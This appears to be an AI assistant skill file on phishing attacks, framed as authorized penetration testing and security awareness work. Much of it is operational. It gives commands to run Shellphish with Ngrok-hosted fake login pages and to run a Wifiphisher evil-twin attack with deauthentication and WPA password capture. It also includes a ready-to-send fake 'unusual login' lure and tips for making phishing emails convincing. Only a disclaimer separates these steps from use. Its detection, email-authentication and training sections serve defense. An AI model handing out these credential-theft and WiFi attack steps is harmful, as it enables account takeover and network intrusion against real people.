---

name: Phishing Attacks description: | The assistant guides users through phishing attack simulation tools and techniques for penetration testing and security awareness. Activate when users ask about "phishing simulation," "social engineering testing," "Shellphish," "WiFi phishing," "credential harvesting," or "security awareness training." version: "1.0.0" tags:

• phishing
• social-engineering
• shellphish
• wifiphisher
• security-awareness

---

Phishing Attacks

Purpose

Demonstrate phishing attack techniques for authorized penetration testing and security awareness training. Enable security professionals to assess organizational susceptibility to social engineering attacks and improve employee security awareness.

Inputs/Prerequisites

• Kali Linux or similar security distribution
• Written authorization for phishing simulation
• Target scope and employee consent
• Network adapter supporting monitor mode (for WiFi attacks)
• Understanding of social engineering principles

DISCLAIMER: This content is for educational and authorized penetration testing purposes only. Never conduct phishing attacks without explicit written authorization.

Outputs/Deliverables

• Phishing campaign results and metrics
• Captured credentials (for authorized testing)
• Security awareness training recommendations
• Vulnerability assessment report
• Remediation guidance

Core Workflow

1. Understanding Phishing

What is Phishing?

Phishing uses deceptive tactics to trick people into revealing sensitive information like passwords or financial details. It exploits human psychology and familiarity with trusted services.

Attack Types:

Why Phishing Works:

• Leverages trust in familiar brands
• Exploits urgency and fear
• Targets human habits and routines
• Bypasses technical security controls

2. Shellphish Tool

Shellphish creates phishing pages for common websites to demonstrate credential harvesting vulnerabilities.

Installation:

Copy# Navigate to installation directory
cd Desktop

# Clone repository
git clone https://github.com/thelinuxchoice/shellphish.git

# Enter directory
cd shellphish
ls

# Set permissions
chmod 744 shellphish.sh

# Launch tool
./shellphish.sh

Available Templates:

Shellphish includes templates for popular platforms:

• Social Media: Facebook, Instagram, Twitter/X, LinkedIn, Snapchat
• Email: Gmail, Yahoo, Outlook
• Streaming: Netflix
• Gaming: Steam, Origin, PlayStation
• Other: GitHub, StackOverflow, GitLab

Using Shellphish:

Copy# Launch the tool
./shellphish.sh

# Select template (e.g., 4 for Twitter)
4

# Choose hosting method:
# 1: Localhost
# 2: Ngrok (recommended for external testing)
2

# Tool starts PHP and Ngrok servers
# Provides phishing URL: https://xxxx.ngrok.io

Attack Workflow:

1. Select Target Platform - Choose template matching target organization
2. Generate Link - Use Ngrok for HTTPS capability
3. Craft Pretext - Create convincing email narrative
4. Deliver Payload - Send phishing email with link
5. Capture Credentials - Monitor for incoming credentials

Sample Email Template:

CopySubject: Security Alert: Unusual Login Attempt Detected

Dear User,

We detected a suspicious login attempt on your account from:
- Location: Unknown
- Device: Windows PC
- Time: [Current Date/Time]

If this wasn't you, please secure your account immediately by
verifying your identity.

[Verify Now] <- Phishing Link

Best regards,
Security Team

Credential Capture:

When target enters credentials:

• Shellphish displays IP address, browser, location
• Credentials shown in plaintext
• Target redirected to legitimate site

3. Wifiphisher Tool

Wifiphisher performs automated WiFi phishing attacks by creating rogue access points.

Requirements:

• Kali Linux
• Two WiFi adapters:
  • One supporting AP (access point) mode
  • One supporting monitor mode

Attack Phases:

1. Deauthentication - Jam target access point, disconnect clients
2. Evil Twin Creation - Clone target AP settings, create rogue AP
3. Credential Capture - Serve phishing page to connected victims

Installation:

Copy# Install Wifiphisher
apt update
apt install wifiphisher

# Or install from source
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
python setup.py install

Basic Usage:

Copy# Launch with default settings
wifiphisher

# Specify interface
wifiphisher -aI wlan0 -jI wlan1

# Use specific phishing scenario
wifiphisher --essid "Free_WiFi" -p firmware-upgrade

Phishing Scenarios:

Attack Flow:

Copy1. Victim connected to legitimate WiFi

2. Wifiphisher:
   - Scans for target networks
   - Sends deauth packets to disconnect victim
   - Creates identical AP (Evil Twin)
   - Sets up captive portal

3. Victim:
   - Device auto-reconnects to stronger signal
   - Opens browser → sees phishing page
   - Enters WiFi password

4. Attacker:
   - Captures WPA credentials
   - Can perform MitM attacks

4. Email Phishing Best Practices

Crafting Convincing Emails:

CopyDO:
✓ Match sender domain closely
✓ Use proper grammar and formatting
✓ Include legitimate-looking logos
✓ Create sense of urgency
✓ Personalize with target information

DON'T:
✗ Use obvious fake domains
✗ Include spelling errors
✗ Make impossible claims
✗ Use threatening language excessively
✗ Request excessive information

Social Engineering Pretexts:

5. Detection and Defense

Email Indicators of Phishing:

CopyCheck for:
- Sender address doesn't match domain
- Generic greetings ("Dear Customer")
- Urgent or threatening language
- Suspicious links (hover to preview)
- Requests for sensitive information
- Unexpected attachments
- Poor grammar/spelling

Technical Defenses:

Copy# Check SPF records
dig txt domain.com | grep spf

# Check DKIM
dig txt selector._domainkey.domain.com

# Check DMARC
dig txt _dmarc.domain.com

Organizational Defenses:

6. Security Awareness Training

Training Resources:

CopyGoogle Phishing Quiz: https://phishingquiz.withgoogle.com/
Free online assessment for phishing recognition

Key Training Topics:

• Recognizing suspicious emails
• Verifying sender identity
• Hovering before clicking
• Reporting procedures
• Password hygiene

Quick Reference

Phishing Indicators Checklist

Copy□ Check sender email address carefully
□ Hover over links before clicking
□ Look for urgency or threats
□ Verify through official channels
□ Never enter credentials from email links
□ Report suspicious emails immediately

Tool Commands

Copy# Shellphish
git clone https://github.com/thelinuxchoice/shellphish.git
cd shellphish && chmod 744 shellphish.sh && ./shellphish.sh

# Wifiphisher
wifiphisher -aI wlan0 -jI wlan1 -p firmware-upgrade

# GoPhish (enterprise phishing platform)
./gophish

Constraints

• Legal: Must have written authorization
• Ethical: Purpose should be defensive/educational
• Scope: Only target authorized systems/users
• Data: Captured credentials must be handled securely
• Reporting: Full disclosure to client required

Examples

Example 1: Authorized Phishing Test

Copy# Set up Shellphish with Gmail template
./shellphish.sh
# Select Gmail (option varies)
# Use Ngrok for HTTPS

# Send controlled test email to authorized users
# Monitor and document results
# Report findings to security team

Example 2: WiFi Security Assessment

Copy# With authorization from network owner
wifiphisher --essid "CompanyWiFi" -p firmware-upgrade

# Document captured credentials
# Report vulnerability to client
# Recommend WPA3 and user training

Troubleshooting

Reporting Findings

Phishing Assessment Report Should Include:

• Executive summary
• Methodology used
• Number of emails sent
• Click-through rate
• Credential submission rate
• User segments most vulnerable
• Comparison to benchmarks
• Recommendations for improvement
• Training material suggestions